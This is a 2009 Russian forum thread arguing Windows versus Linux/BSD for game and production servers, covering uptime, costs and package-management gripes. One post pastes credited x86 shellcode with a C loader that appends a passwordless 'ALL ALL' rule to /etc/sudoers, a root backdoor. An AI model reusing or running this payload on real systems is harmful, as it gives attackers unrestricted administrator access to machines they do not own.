Просмотр полной версии : Linux vs Windows (Перенос..)
tovarisch_Ko
03.02.2009, 17:28
Кто подскажет как командер под линуксом запустить? :rtfm:
А зачем парится и изгаляться под Линуксом?
Он же дороже, сложнее в настройках и управлении, менее стабилен, наконец, чем винда.
Сплошные неудобства и большие затраты времени.
Линукс это для пионеров которым нечем заняться или для узких профессионалов, для решения их же узкоспециализированных задач.
Он же дороже, сложнее в настройках и управлении, менее стабилен, наконец, чем винда.
Линукс это для пионеров которым нечем заняться или для узких профессионалов, для решения их же узкоспециализированных задач.
Ко, дорогой, когда 11 регионов РФ опутаны только одним провайдером, с дикими ценами на внешний инет, и руководство этого провайдера устанавливает правила "только под линукс", то некуда деватся... там тоже летают товарищи с "нуля". Два года бился по установке сервера под винду и т.д.... у очень многих нет вообще возможности по анлиму или "внешке" выходить. тут или "бросить ил" или "париться".
Юмор?
DogEater
03.02.2009, 22:27
Юмор?
Видимо, товарищ не знает что такой бить баклуши при аптайме от пары лет и выше...:)
tovarisch_Ko
04.02.2009, 00:49
Ко, дорогой, когда 11 регионов РФ опутаны только одним провайдером, с дикими ценами на внешний инет, и руководство этого провайдера устанавливает правила "только под линукс", то некуда деватся... там тоже летают товарищи с "нуля". Два года бился по установке сервера под винду и т.д.... у очень многих нет вообще возможности по анлиму или "внешке" выходить. тут или "бросить ил" или "париться".
Да понятно, что NIX-специалистам надо как-то поддерживать свою нужность и оправданность эксклюзивных зар...положения.
А зачем биться по установке на сервер винды, не проще поставить собственный сервер как железку и ни у кого тогда не спрашивать ни советов, ни разрешений - что ставить на эту собственную железку?
Нынче вон родные интеловские "легкие" 1U cервера совсем не дороги, как, хотя бы они же, 3-4 года назад, да еще и монитор никакой не нужен...
Или у провайдера действительно так жестко, что он и клиентов со своим железом ограничивает, что им там и как на нем делать?
Добавлено через 2 минуты
Юмор?
Вовсе нет. Просто не нужно "прикручивать" то, что предназначено для решения совсем других задач, к задачам для которых вполне годятся более простые и дешевые решения.
tovarisch_Ko
04.02.2009, 00:59
Видимо, товарищ не знает что такой бить баклуши при аптайме от пары лет и выше...:)
Почему не знаю, очень даже до 2004 года дома сидел на диалапе, междугороднем, потому как на краю города и ни один провайдер не желал тянуть провода ради 3-4-5 клиентов, всего-то через 3 дома.
Теперь есть АДСЛ, то же ждал 1,5 год, пока "оборудование установят на АТС" и пошли они воздушники... кабель зарытый в земле и сертифицированное оборудование лучше, чем сидеть летом в грозы по 2-3 недели без связи.
Добавлено через 3 минуты
это смотря где. У нас хостинг берет на 10 евронов больше за винду, чем за линух.
Это за собственный сервер клиента или все же за предоставленные самим провайдером сервер?
Надеюсь мы об одном говорим - о коллокейшн?
А софт нулевый переносится на Линукс без проблем, т.к. и Питон, и Firebird SQL существут NIXовые.
tovarisch_Ko
04.02.2009, 01:43
Всетаки он не знает :)
Про монополиста, дикие цены и что народу нужен хотя бы внутренний сервер?
И все равно это не отменят, что своя железка с виндой проще и дешевле, или тут тоже все так плохо с монополистом?
Коли не юмор, то раскажите тогда чем линукс дороже, чем сложнее и особенно менее стабилен? А то голословность сплошная выходит.
А Win2003 предназначена для общего пользования? Гы...смешно :)
Не надо в одну кучку складывать десктопы и серверы, тут разговор о серверах идет..."как бе".
Кстати, был случай, одной тетке, буху, поставили какую-то кубунту на рабочую машину, сказали что это новая винда и она до сих пор всем довольна. Эску она все-равно по RDP брала.
Добавлено через 1 минуту
И все равно это не отменят, что своя железка с виндой проще и дешевле, или тут тоже все так плохо с монополистом?
Это с чего своя железка с виндой стала дешевле? Али вы просто не знаете, что продукт от фирмы Майкрософт стоит денег? :D
Или может быть вы наивно полагаете, что любой провайдер вам даст припереть какой-нибудь свой мидл-тауэр собранный из подручных материалов и сунуть его "тут рядышком в уголке"?
P.S. Holy war я разводить нисколько не собираюсь...ибо глупое занятие
SilverFox
04.02.2009, 12:23
Нет - про это :
Видимо, товарищ не знает что такой бить баклуши при аптайме от пары лет и выше...
У меня серваки пока новые , столько не наработали, но старые и поболее 2 лет работали без перезагрузки. То есть настроил поставил и бей баклуши :)
[sfox@main ~]$ top
top - 12:21:17 up 201 days,
А вот бухсерверу на 2003 MS стока наработать никак не получается :)
tovarisch_Ko
04.02.2009, 14:35
Коли не юмор, то раскажите тогда чем линукс дороже, чем сложнее и особенно менее стабилен? А то голословность сплошная выходит.
Тем дороже и сложнее, что специалисты для него дороже в разы и реже к тому же значительно, пионеры, которые изучают продукт в процессе установки и эксплуатации никому нафиг не нужны.
Или вы думаете, что вся стоимость системы определяется только стоимостью дистрибутива и железа? Наверняка ведь знаете про понятие "стоимость владения"?
А стабильность вообще понятие слабоопределяемое, хотя бы в силу применимости продукта, вот у меня Линукс абсолютно не стабилен, потому как попросту не применим.
А Win2003 предназначена для общего пользования? Гы...смешно :)
Не надо в одну кучку складывать десктопы и серверы, тут разговор о серверах идет..."как бе".
А интересно, для чего еще по вашему? :)
Про десктопы и речи нет.
Это с чего своя железка с виндой стала дешевле?
Потому что один раз заплатил за неё и далее провайдеру только за размещение и трафик.
Али вы просто не знаете, что продукт от фирмы Майкрософт стоит денег? :D
Разумеется стоит денег, при чем не намного дороже такого же коробочного NIX дистрибутива с нормальной подпиской-поддержкой.
Или может быть вы наивно полагаете, что любой провайдер вам даст припереть какой-нибудь свой мидл-тауэр собранный из подручных материалов и сунуть его "тут рядышком в уголке"?
Провайдер который пускает к себе с мидл-тауэрами и не провайдер вовсе, так железо-помойка, тут даже рассматривать нечего.
Добавлено через 13 минут
Нет - про это :
У меня серваки пока новые , столько не наработали, но старые и поболее 2 лет работали без перезагрузки. То есть настроил поставил и бей баклуши :)
А меня не новые, уже 6 лет под 2000 виндой и MS SQL работают, так же все в порядке, только пылесосить иногда надо, потому как стоят просто в оффисе.
SilverFox
04.02.2009, 14:53
А меня не новые, уже 6 лет под 2000 виндой и MS SQL работают, так же все в порядке, только пылесосить иногда надо, потому как стоят просто в оффисе.
Все одно не не понимаешь нас что ли ?
Приведи время работы без перезагрузки твоих компов - up time.
tovarisch_Ko
04.02.2009, 15:08
Все одно не не понимаешь нас что ли ?
Приведи время работы без перезагрузки твоих компов - up time.
Все 6 лет. Выключаются раз в год для профилактики железа (пылесос).
Сервер Нуля без перезагрузки работал с момента запуска до мая прошлого года, когда переставили систему ради некоторых новых фич, при чем через 4 месяца после запуска пережил смену платформы (железа) без переустановки софта.
Это спор бессмысленный. Винда уже давно ни чем не хуже Линукса, в плане стабильности, что собственно доказывается её куда большей распространённостью, а серверная вообще никогда не была хуже. В плане же удобства администрирования Линукс всегда уступал.
Тем дороже и сложнее, что специалисты для него дороже в разы и реже к тому же значительно, пионеры, которые изучают продукт в процессе установки и эксплуатации никому нафиг не нужны.
Или вы думаете, что вся стоимость системы определяется только стоимостью дистрибутива и железа? Наверняка ведь знаете про понятие "стоимость владения"?
А стабильность вообще понятие слабоопределяемое, хотя бы в силу применимости продукта, вот у меня Линукс абсолютно не стабилен, потому как попросту не применим.
А я по наивности думал, что любые специалисты стоят дорого. А оказывается спецы винды дешевле...каковы спецы, такова и цена.
А для меня стабильность это в первую очередь стабильность работы.
Опять же есть пример. У меня Иловский сервер крутится под 2k3, на которую у меня только гостевой вход. Машина вполне себе на правильном железе, вполне себе работает не в экстремальных режимах, и в присутствии хозяина ведет себя вполне адектватно. Но вот стоило ему уехать на длительные каникулы и машина через три недели сама по себе стала виснуть раз в сутки. Просто тупо уходит со связи и все тут. Теперь вот ждём возвращения хозяина как маны небесной. Вот такие вещи я вкладываю в понятие стабильности.
А интересно, для чего еще по вашему? :)
Для общего пользования существуют десктопные операционки. Хотя если вам нравится забивать гвозди микроскопом...
Потому что один раз заплатил за неё и далее провайдеру только за размещение и трафик.
А в случае линукса надо за что-то платить дополнительно? :eek:
Кстати!, сама по себе винда полный ноль...просто окна без всего. Так что к стоимости операционки прибавляйте стоимости расширения функциональности и сервисов. А это уже сумма. Кстати, для чего нульваровский сервер использует бесплатные и совсем неродные для M$ пайтон, зопу и файрберд, если мог с огромным для себя преимуществом работать под IIS и быть написаным на си-шарпе с базой в MS SQL? :) Тем более это должно было уменьшить "стоимость владения".
P.S. А если в общем, то моё мнение всегда было и будет оставаться следующим - выбирать инструмент нужно прежде всего исходя из задачи. Про микроскоп я уже написал.
tovarisch_Ko
04.02.2009, 17:17
А я по наивности думал, что любые специалисты стоят дорого. А оказывается спецы винды дешевле...каковы спецы, такова и цена.
Возможно, но скорее всего конкуренция, специалистов под винду больше и она проще, отсюда зарплата ниже. Вы бы еще Оракловцев или Цисковцев вспомнили.
Как будьто есть другое понятие.
У меня вот тоже есть знакомый построивший сервер под серьезный проект все железо правильное - платформа не левая интеловская, всякие там 4-х ядерники, много правильной памяти, рэйды и пр. террабайты, и теперь жалуется на сбои, под Линуксом как раз => Линукс не стабилен нифига :)
Кстати!, сама по себе винда полный ноль...просто окна без всего. Так что к стоимости операционки прибавляйте стоимости расширения функциональности и сервисов. А это уже сумма.
Это про любую операционку можно сказать - они для того и существует, чтобы застваить груду железа выполнять полезные функции.
А уж какие, это определяется надстройками.
Кстати, для чего нульваровский сервер использует бесплатные и совсем неродные для M$ пайтон, зопу и файрберд, если мог с огромным для себя преимуществом работать под IIS и быть написаным на си-шарпе с базой в MS SQL? :) Тем более это должно было уменьшить "стоимость владения".
А кто будет платить за переход от Файрберда на MSSQL или перекодировать с Пайтона на C#? И почему они собственно не родные?
Никаких виртуальных машин и т.п. для них запускать не надо ведь.
P.S. А если в общем, то моё мнение всегда было и будет оставаться следующим - выбирать инструмент нужно прежде всего исходя из задачи. Про микроскоп я уже написал.
Вот именно, к чему и пришли, раз Ил изначально сделали под винду, то нефиг и изгаляться.
Возможно, но скорее всего конкуренция, специалистов под винду больше и она проще, отсюда зарплата ниже. Вы бы еще Оракловцев или Цисковцев вспомнили.
А чего их вспоминать. Не считаю себя крутым цискарём, но хлеб приходится зарабатывать то циски перетряхивая, то линуха перелопачивая.
Я почему винду недолюбливаю...она суть "чёрный ящик". Что происходит внутри можно только гадать и при этом ни разу не попасть в правильный ответ :)
У меня вот тоже есть знакомый построивший сервер под серьезный проект все железо правильное - платформа не левая интеловская, всякие там 4-х ядерники, много правильной памяти, рэйды и пр. террабайты, и теперь жалуется на сбои, под Линуксом как раз => Линукс не стабилен нифига :)
Странно это...весьма
А кто будет платить за переход от Файрберда на MSSQL или перекодировать с Пайтона на C#? И почему они собственно не родные?
Никаких виртуальных машин и т.п. для них запускать не надо ведь.
Они родом фром *nix, все до единого. Ну разве что файрбёрд странный перебежчик-оборотень из винды :)
P.S. Ладно, хорош офтопить. Это конечно интересно, только толку ноль. Кстати, а вы для чего в эту тему вообще зашли? :)
tovarisch_Ko
04.02.2009, 17:56
Они родом фром *nix, все до единого. Ну разве что файрбёрд странный перебежчик-оборотень из винды
С чего это вдруг? То что они свободно распространяемые и их сначала реализовали под NIХы ещё ничего не значит.
Странно это...весьма
Ничего странного. Проблемы с софтом, т.к. с железом их нет, и дело не в стабильности Линукса как платформы, и не кривые руки там у кого надо, но...
P.S. Ладно, хорош офтопить. Это конечно интересно, только толку ноль. Кстати, а вы для чего в эту тему вообще зашли? :)
Любопытства ради - чего это народ придумывает себе сложности, а потом мужественно их преодолевает.
Ничего против Линукса и пр. NIXов не имею, как и против их приверженцев, просто хотел узнать, зачем конкретно в этом случае...
=SF=Andre
04.02.2009, 20:00
У меня FTP сервер + технический форум стоит под 2003 и вопросов нет, работает как часики, а вот сервер, что под пингвином порядком всем уже надоел, сборку ту, что работает, собирали несколько человек, а фактически один. Так вот, когда пингвин падает, все только разводят руками и смотрят в рот системному администратору, и в чём плюс, в том, что человек молится на пингвина ? Вот вам и царь и Бог в одном лице, да и вообще, что теперь на одного человека молится ? Где унифицированность ?
Лично для себя я сделал вывод, всё что нужно для серверной части, так это стабильность и понимание тех, кто эту систему обслуживает. Как сказал один товарищ, который в совершенстве работает в сервеной части винди и люнекса, Не ставьте люникс - это сборище глюков и он достаточно неповоротлив..........
DogEater
04.02.2009, 20:38
Спор стар как мир. Похоже здесь образовался филиал ЛОР или опеннета.
Вы(виндузятники и линуксоиды) ещё БСДшников задирать начните для абсолютного счастья. :umora:
tovarisch_Ko
04.02.2009, 22:21
Спор стар как мир. Похоже здесь образовался филиал ЛОР или опеннета.
Вы(виндузятники и линуксоиды) ещё БСДшников задирать начните для абсолютного счастья. :umora:
Спор возник на вопросе - зачем ставить Линукс, там где необходимости в нем нет?
И тему сразу увели в сторону спора что лучше.
NIXы не хуже и не лучше винды, всему свое применение, в примении их к Ил-2 есть большое сомнение, развеять которое ни как не получается.
Что лучше или хуже, все зависит от точки зрения, естественно каждый профессионал будет доказывать свою нужность, но есть еще и точка зрения пользователя-потребителя-заказчика, т.е. тогокто будет работать и того кто будет поддерживать.
Добавлено через 5 минут
Я почему винду недолюбливаю...она суть "чёрный ящик". Что происходит внутри можно только гадать и при этом ни разу не попасть в правильный ответ :)
То же самое можно сказать про Линукс, если ты не являешься его разработчиком-кодировщиком, а пользователи, да и админы таковыми обычно :) не являются.
Да, в Линукс "ящички" поменьше, зато их побольше, и что на самом деле лучше - еще можно поспорить.
А проблемы, у разработчиков, и там и там одинаковые, и решаются они одинаково, потому как Линукс уже давно разрабатывается на тех же принципах, что и винда, у них только принцип распространения и поддержки отличается, что не в пользу Линукс, сейчас.
DogEater
04.02.2009, 22:26
Глубокая мастурбация с wine ИМО не стоит того. Надёжнее не станет.
То, что отсутствует версия сервера Ила под linux/bsd - печально - но это факт.
собственно всё.
tovarisch_Ko
04.02.2009, 22:33
...
Лично для себя я сделал вывод, всё что нужно для серверной части, так это стабильность и понимание тех, кто эту систему обслуживает. Как сказал один товарищ, который в совершенстве работает в сервеной части винди и люнекса, Не ставьте люникс - это сборище глюков и он достаточно неповоротлив..........
Все правильно, Линукс сейчас это "пальцы", единственная необходимость в нем - чтобы Микрософт не заснул.
Добавлено через 1 минуту
Глубокая мастурбация с wine ИМО не стоит того. Надёжнее не станет.
То, что отсутствует версия сервера Ила под linux/bsd - печально - но это факт.
собственно всё.
И не будет никогда - спрос и так не велик и тратить усилия никто не будет, да и смысла нет - все равно игровая платформа виндовая, а не NIXовая, скорее под игроприставки напишут, что собственно уже и делается.
basurman
04.02.2009, 23:05
... Как сказал один товарищ, который в совершенстве работает в сервеной части винди и люнекса, Не ставьте люникс - это сборище глюков и он достаточно неповоротлив..........
А мужики то не знают, у которых QNX стоит...
Им надо срочно на винду переходить...
вы еще верите в линух? тогда мы летим к вам!
Author: Rick
Email: rick2600@hotmail.com
Description: Anyone can run sudo without password
section .text
global _start
_start:
;open("/etc/sudoers", O_WRONLY | O_APPEND);
xor eax, eax
push eax
push 0x7372656f
push 0x6475732f
push 0x6374652f
mov ebx, esp
mov cx, 0x401
mov al, 0x05
int 0x80
mov ebx, eax
;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len);
xor eax, eax
push eax
push 0x0a4c4c41
push 0x203a4457
push 0x53534150
push 0x4f4e2029
push 0x4c4c4128
push 0x3d4c4c41
push 0x204c4c41
mov ecx, esp
mov dl, 0x1c
mov al, 0x04
int 0x80
;close(file)
mov al, 0x06
int 0x80
;exit(0);
xor ebx, ebx
mov al, 0x01
int 0x80
*/
#include <stdio.h>
#include <string.h>
char code[] =
"\x31\xc0\x50\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64"
"\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xb0\x05"
"\xcd\x80\x89\xc3\x31\xc0\x50\x68\x41\x4c\x4c\x0a\x68"
"\x57\x44\x3a\x20\x68\x50\x41\x53\x53\x68\x29\x20\x4e"
"\x4f\x68\x28\x41\x4c\x4c\x68\x41\x4c\x4c\x3d\x68\x41"
"\x4c\x4c\x20\x89\xe1\xb2\x1c\xb0\x04\xcd\x80\xb0\x06"
"\xcd\x80\x31\xdb\xb0\x01\xcd\x80";
void main(void) {
void (*shellcode)() = code;
shellcode();
}
RR_Vespertinus
04.02.2009, 23:55
Да уж, смешной спор...
а мужики в всяких яндексах, гуглах и т.п. и не знают, что оказывается винда то надежнее :D и наверно по своей природной глупости ставят на тысячи серверов линукс или FreeBSD. и эти сервера работают годами под нехилыми нагрузками.
Добавлено через 12 минут
...SKIP...
а сами проверяли?
проверил на 3х дистрибутивах, ни на одном это ни к чему не привело, кроме сегфолта ;) (попытка доступа в чужую память)
basurman
04.02.2009, 23:59
проверил на 3х дистрибутивах, ни на одном это ни к чему не привело, кроме сегфолта ;) (попытка доступа в чужую память)
Значит это неправильные дистрибутивы :rtfm:
:)
А я вот верю в Netbsd и FreeBSD :) А вот в винду не верю совсем ) Особливо в серверной части :) Хотя вру - есть у Винды хорошие проекты типа Sharepoint но их по пальцам пересчитать можно
Про десктоп не говорим ) Тут была фраза что винда давно не хуже никсов в плане стабильности серверной части. Хотелось бы уточнить про какие серверные продукты шла речь ? :)
tovarisch_Ko
05.02.2009, 01:40
Да уж, смешной спор...
а мужики в всяких яндексах, гуглах и т.п. и не знают, что оказывается винда то надежнее :D и наверно по своей природной глупости ставят на тысячи серверов линукс или FreeBSD. и эти сервера работают годами под нехилыми нагрузками....
А вы так уверены, что там стоят именно Линукс и именно FreeBSD? :)
RR_Vespertinus
05.02.2009, 03:16
Это как бы ни для кого не секрет :)
об этом говорится на каждой конференции, ну и в сети публикуется информация о средставх которые используют гиганты.
Например, если брать в расчет рунет, среди всех более менее значимых больших контора типа яндекс, рамблер, mail.ru, rbk, sup и т.д. только в апорте когда - то была винда. В остальных заведениях это или линукс (Debian или open suse) или FreeBSD
Старьем кормите кого-нибудь другого :)
Добавлено через 24 минуты
У меня друг работает в весьма крупном интернет проекте. Внутри почти все на CentOS на блейд-серверах. Винда там встречается изредка на нотбуках.
Кстати, подскажите мне, почему в Juniper'ах его JunOS основана на FreeBSD? А для чего во всяческих DVD-плеерах и различных сетевых прибамбасах (dsl момеды, свитчи, роутеры) стоит линукс? И покажите мне хоть один гаджет с виндой? А ведь она проще, стабильнее и дешевле. Вы серьёзно думаете, что китайцы настолько тупы, что будут ставить в железки то, что сложнее и дороже в разработке? :)
Правда китайцы много что могут, например вот такой антенный усилитель сделать и продавать :)
*nix и его сотоварищи хороши везде, где необходима (или желательна) заточка под конкретные задачи, и ресурсов либо впритык, либо они должны использоваться максимально эффективно. При этом вопрос адаптации под разное железо не ставится изначально - есть платформа и точка.
Универсальной же ОС для обычного пользователя, является Windows. Потому что поддерживает кучу железа (старого, нового, хорошего и китайского), проста в установке и настройке. И лучше знает русский язык (для нас это актуально).
Насчет серверов. Не знаю, линуксовых не видел. А вот на Windows 2000 server стояла у нас в ап-тайме одна железка 4 с половиной года. Выключили в целях замены батарей на ИБП. После замены включили его и опять забыли на очередные 4-5 лет.
Сдается мне, что не от версии (или типа) ОС зависит стабильность сервера, а от железа, условий в которых это железо эксплуатируется и (наверное самое главное) - грамотной настройки сервера под его задачи.
DogEater
05.02.2009, 10:19
Железо чрезвычайно важно.
Самосборное железо может глючить непредсказуемо.
Когда-то я собрал "сервер" для наших дизайнеров - полтора года с ним мучились.
Потом купили IBM Netfinity, "шапку" я со старого перетащил - молотит до сих пор. Перезагрузки только из-за замены дисков(постоянно заменяем на бОльший размер).
2 года назад настроил людям W2k3 сервер xServer 226 под mssql. Пока не дёргали :)
Правда китайцы много что могут, например вот такой антенный усилитель сделать и продавать :)
А держатель предохранителя то - ДПБ ( ещё видимо советский), резисторы СП5-22 с ромбиком приёмки, да и транс похоже тоже... - где же живут такие бесчестные китайцы? :) Ставлю миллион к одному что фамилии у этих дельцов вовсе не китайские :)
P.S. диод без ленточки катода - похож на КД208-209 (маркировка на торце)
А держатель предохранителя то - ДПБ ( ещё видимо советский), резисторы СП5-22 с ромбиком приёмки, да и транс похоже тоже... - где же живут такие бесчестные китайцы? :) Ставлю миллион к одному что фамилии у этих дельцов вовсе не китайские :)
P.S. диод без ленточки катода - похож на КД208-209 (маркировка на торце)
Утверждалось, что у китайцев куплено. Хотя да, держатель однозначно совейский :) Кстати, вот тут тоже показывали поделие:
http://www.burcev.ru/catalog/product/Super_DAC/ - сайт производителя, гляньте цену.
А вот его внутренности:
http://s56.radikal.ru/i151/0812/55/cb21ac8b7090.jpg
Утверждалось, что у китайцев куплено. Хотя да, держатель однозначно совейский :) Кстати, вот тут тоже показывали поделие:
http://www.burcev.ru/catalog/product/Super_DAC/ - сайт производителя, гляньте цену.
А вот его внутренности:
http://s56.radikal.ru/i151/0812/55/cb21ac8b7090.jpg
дык тож не китайское,
Цитата с сайта производителя: Гарантии – 10 лет на Super DAC и 20 лет на тактовый кварцевый генератор (военная приемка). Когда это у китайцев было такое? :)
Вторичный признак - двусторонняя печатная плата с маской - что нетипично для дешевых китайских технологий.Разводка платы опять же слишком каноническая - проводники под 45 и 90° - скорей похоже на нашу школу. Монтаж выполнен хоть и ужасно, но термоклеем фиксируется только конденсаторы и светодиод - китайцы зафиксировавли бы и провода.
дык тож не китайское,
Цитата с сайта производителя: Гарантии – 10 лет на Super DAC и 20 лет на тактовый кварцевый генератор (военная приемка). Когда это у китайцев было такое? :)
Вторичный признак - двусторонняя печатная плата с маской - что нетипично для дешевых китайских технологий.Разводка платы опять же слишком каноническая - проводники под 45 и 90° - скорей похоже на нашу школу. Монтаж выполнен хоть и ужасно, но термоклеем фиксируется только конденсаторы и светодиод - китайцы зафиксировавли бы и провода.
Вы плохо смотрели...там самый отечественный электропром. Бутман даже выбрал %)
Я таких поделий могу пачками показывать...особенно славятся аппараты лечения всего и вся, типа "Онега"...полный писец..."а внутре у ей думатель и анализатер"...и никому нет дела, что за лохов бедных стариков держат.
И тут оффтопить завершаю...ибо грустно слишком все это.
CTPEK03A
05.02.2009, 22:25
Ндя... Еслиб пришлось ставить сервер то пожлуй распределил бы ОС по ранжиру:
FreeBSD.
M$ Windows 2XXX
и только потом Linux.
В последнем- больше всего будет проблем. Клоненный-переклоненный, ядро делают одни люди, либы -другие, программы - третьи... В итоге "черте что и сбоку бантик". Пакетозависимая весьма оська. Причем настолько это пакетозависимость достигла пределов порнографического искусства, что ..... Пока я еще не встречал ни одного дистриба GNU\Linux без меленьких и крупеньких глючков. Стрёмненько вощем......
А вот первые две Оси - собираются всегда одной и той же коммандой. Досканально штудируются на всяческие огрехи и прорехи и стабильность. Ядрёна система M$ однозначно лучше всех, а система "портов" BSD - гораздо лучше "пакетного кошмара" Linux.
Больше шансов, что под первыми двумя- возникнет меньше всего проблем при дальнейшей эксплуатации.
Если б еще M$ открыли-таки все тайны ntfs для всех, и "фряха" бы научилась бы эту ФС пользовать красиво и правильно... Вообще бы было шикарно. :rolleyes:
RR_Vespertinus
05.02.2009, 23:12
FreeBSD.
M$ Windows 2XXX
и только потом Linux.
В последнем- больше всего будет проблем. Клоненный-переклоненный, ядро делают одни люди, либы -другие, программы - третьи... В итоге "черте что и сбоку бантик". Пакетозависимая весьма оська. Причем настолько это пакетозависимость достигла пределов порнографического искусства, что ..... Пока я еще не встречал ни одного дистриба GNU\Linux без меленьких и крупеньких глючков. Стрёмненько вощем......
А вот первые две Оси - собираются всегда одной и той же коммандой. Досканально штудируются на всяческие огрехи и прорехи и стабильность. Ядрёна система M$ однозначно лучше всех, а система "портов" BSD - гораздо лучше "пакетного кошмара" Linux.
Больше шансов, что под первыми двумя- возникнет меньше всего проблем при дальнейшей эксплуатации.
Если б еще M$ открыли-таки все тайны ntfs для всех, и "фряха" бы научилась бы эту ФС пользовать красиво и правильно... Вообще бы было шикарно. :rolleyes:
Спокойнее :)
Вот как раз что ОЧЕНЬ убого в БСД и очень хорошо во вменяемых дистрибутивах линукса это система пакетов. По удобству обслуживания и разработки БСД просто в ауте ;)
ненадо вспоминать порты ;) за это давно давно надоб руки порубить.
Если попытаться быть объективным, в БСД есть ОДНО неоспоримое преимущество - kqueue, e-poll к сожалению, еще не может полностью заменить.
Все :)
дальше субъективное - к сожалению, просто безобразно неудобная система с точки зрения разработчика.. то что там называется пакетами - какое-то недоразумение. если что-то нужно, сразу надо компилить... я конечно понимаю, бывает и хуже (привет гентушникам).
P.S. не один год работал ток под виндой, потом стал под Линуксом и БСД.
в моеме личном рейтинге:
Windows - Для дома, для игр.
Linux - сервера + десктопы для разработчиков, работать удобнее чем под виндовс, как это ни странно..
BSD - только сервера, при чем обоснованно применение ток если нужно использовать сетевые особенности kqueue.
P.P.S 64 битная FreeBSD Это отдельная песня :D года 2 назад никак не признавала 12 гигов оперативки, видела ток 4ре. что только не делали наши админы. Ну и по мелочам радостей хватает
сори, если что, енто не наезд )
теперь, тож остываю
FreeBSD.
M$ Windows 2XXX
и только потом Linux.
А в мегаудобной винде вообще софт надо сперва найти, потом поставить, а часто ещё и купить (взломать)...и никакой системы пакетов и вменяемого поиска программ :) Кошмар! :)
..Удалено.., хоть по одному крупному и мелкому глючку линукса назовите?
А то как в анекдоте:
- Изя, Вы слушали биттлз?
- Нет.
- Божеш Вас упаси их слушать. Мине вчера Мойша напел, п'госто ужасно ка'гтавят!
CTPEK03A
06.02.2009, 18:09
А в мегаудобной винде вообще софт надо сперва найти, потом поставить, а часто ещё и купить (взломать)...и никакой системы пакетов и вменяемого поиска программ :) Кошмар! :)
Да точно таким же макаром, как и в linux, только через обычный поисковик. Поскольку операционка пакетонезависима и мультиядерна - то совершенно пофигу, какой программный продукт ты проинсталишь. Целостность системы отэтого едва-ли пострадает. У меня вон по сию пору работают программы, аж 1992 года выпуска. :eek: И пофигу библиотеки.
Чё там искать-то? Былоб чего... Львиная доля стандартных по дефолту программ - это кроссплатформенные приложения. Практически, всё что есть под *nix - есть и под windows.
Другое дело, что некоторые профессиональные приложения существуют только под windows и платно, а под *nix вообще - никак. Но это всё с точки зрения десктопоюзеров. В отношении серверов - тебе и 0,01% всего этого софтварного барахла не понадобится.
..Удалено.., хоть по одному крупному и мелкому глючку линукса назовите?А то как в анекдоте:
Любой багтрэк к вашим услугам. У любого дистриба есть такой сборничек "косячков". Причем, там такие описания, таких нелепых и тупейших по сути своей ошибок, что "башорг" просто отдыхает.
CTPEK03A
06.02.2009, 18:14
Вот как раз что ОЧЕНЬ убого в БСД и очень хорошо во вменяемых дистрибутивах линукса это система пакетов.
Пакетозависимые системы - не могут быть хорошими по определению. Это полный отстой и убожество. Хоть для разработчиков, хоть для кого хочешь. Это очень и очень плохо. А в сочетании ещё и с моноядром - совсем погано.
RR_Vespertinus
06.02.2009, 18:25
Пакетозависимые системы - не могут быть хорошими по определению. Это полный отстой и убожество. Хоть для разработчиков, хоть для кого хочешь. Это очень и очень плохо. А в сочетании ещё и с моноядром - совсем погано.
По "определению" это хороший критерий :)
Мой собственный опыт говорит об обратном
Добавлено через 2 минуты
Любой багтрэк к вашим услугам. У любого дистриба есть такой сборничек "косячков". Причем, там такие описания, таких нелепых и тупейших по сути своей ошибок, что "башорг" просто отдыхает.
То есть в БСД багтрек всегда пуст и нет ошибок? :lol: :eek:
Ну, честно, как-то совсем неубедительно.
CTPEK03A
06.02.2009, 18:47
Всё познаётся в сравнении. Багтрэки есть у всех, но разного объёма и разной степени глупости.
Когда в багзиллу фигарят вот такие комменты:
Обновился я до dist-upgrade с 21.02.2006 нп 22.02.2006. После перезапуска системы 22.02.2006 оказалось, что apt снес почти все (в частности mutt, XOrg, firefox, thunderbird, половину kde и пр.). Самое интересное, что он снес и самого себя. :D
Попытка установить apt привела к необходимости обновить libreadline. Обновление этой библиотеки требовало обновление bash/sh. Потом пошло-поехало... Накачал я все это вручную, запустил старый добрый rpm... Вылетел Oops... где-то на обновлении питона. Весело... В результате bash не успел обновиться и не запускался с обновленной libreadline. Все исправил... Осталось понять что же снес-таки apt?! :umora:
- это уже назывется "жечь неподетски!". Ответы в тойже ветке багзиллы от разработчиков - жгут еще более ярким напалмом:
Сам дурак, а мы - гении! Юзай в дальнейшем хешер и не отвлекай людей на пустяки!
Вот оно твое "преимущество пакетов", которого по сути нет. Сама по себе возможность разнести всю систему по косточкам с помощью менеджера пакетов - это ну никак не плюс в сторону безопасности и отказоустойчивости системы.
Бывает еще более смешная ситуация: обновление какой-либо программы, которое тебе до зарезу требуется. Угу... Программа-то обновляется, но заменяет старые библии на новые, которые ей необходимы для правильной работы, вот только старые программы, которые ты используешь -напрочь откзываются работать с новыми библиотеками. Начинается стандартный "*nix геморой и пляски с бубнами". Вплоть до полного апгрейда системы, который тоже ничего хорошего не принесет. К примеру, более новые версии программ - оказываются менее функциональными или менее удобными чем предыдущие. Нет уж- нафиг... нафиг...
Там ощущение такое -"Проинсталлил и ничего больше не трогай! Работает - и молись!" Как будто идешь по тонкому льду, а он под тобой похрустывает и в любой момент может проломиться.
А можно узнать с какого перепуга вы глюк конкверора отнесли к глюкам линукса? :)
Всё познаётся в сравнении. Багтрэки есть у всех, но разного объёма и разной степени глупости.
Когда в багзиллу фигарят вот такие комменты:
Цитата:
Обновился я до dist-upgrade с 21.02.2006 нп 22.02.2006. После перезапуска системы 22.02.2006 оказалось, что apt снес почти все (в частности mutt, XOrg, firefox, thunderbird, половину kde и пр.). Самое интересное, что он снес и самого себя. :D
Попытка установить apt привела к необходимости обновить libreadline. Обновление этой библиотеки требовало обновление bash/sh. Потом пошло-поехало... Накачал я все это вручную, запустил старый добрый rpm... Вылетел Oops... где-то на обновлении питона. Весело... В результате bash не успел обновиться и не запускался с обновленной libreadline. Все исправил... Осталось понять что же снес-таки apt?! :umora:
- это уже назывется "жечь неподетски!". Ответы в тойже ветке багзиллы от разработчиков - жгут еще более ярким напалмом:
Цитата:
Сам дурак, а мы - гении! Юзай в дальнейшем хешер и не отвлекай людей на пустяки!
А это вообще не к месту цитирование. Все давно знают, что сизиф в альте это репозитарий ради репозитария, из-за этого из их команды ушло много весьма толковых мэйнтейнеров.
